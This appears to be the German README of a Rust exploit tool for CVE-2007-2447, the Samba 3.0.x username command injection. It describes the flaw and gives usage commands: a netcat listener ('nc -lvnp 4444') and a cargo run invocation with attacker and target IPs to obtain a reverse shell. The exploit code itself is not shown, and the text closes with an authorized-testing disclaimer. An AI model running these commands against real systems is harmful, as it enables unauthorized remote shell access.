
Eine eigenständige Rust-Implementierung des CVE-2007-2447-Exploits, der auf Samba smbd 3.0.20-Debian abzielt.
Eine eigenständige Rust-Implementierung des CVE-2007-2447-Exploits, der auf Samba smbd 3.0.20-Debian abzielt.
CVE-2007-2447 ist eine Befehlseinschleusungssicherheitslücke in Samba-Versionen 3.0.0 bis 3.0.25rc3. Die Schwachstelle besteht in der Funktion SamrChangePassword(), die Benutzereingaben nicht ordnungsgemäß bereinigt, sodass Angreifer über Shell-Metazeichen im Benutzernamenfeld während der SMB-Authentifizierung beliebige Befehle ausführen können.
netcat verfügbar haben (normalerweise standardmäßig installiert)cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
# Netcat-Listener einrichten
nc -lvnp 4444
# Exploit ausführen
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
--lhost: IP-Adresse Ihres Angriffsrechners--lport: Port zum Empfangen der Reverse-Shell-Verbindung--target: IP-Adresse des ZielrechnersDieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Penetrationstests. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Sie besitzen oder für die Sie eine ausdrückliche Genehmigung haben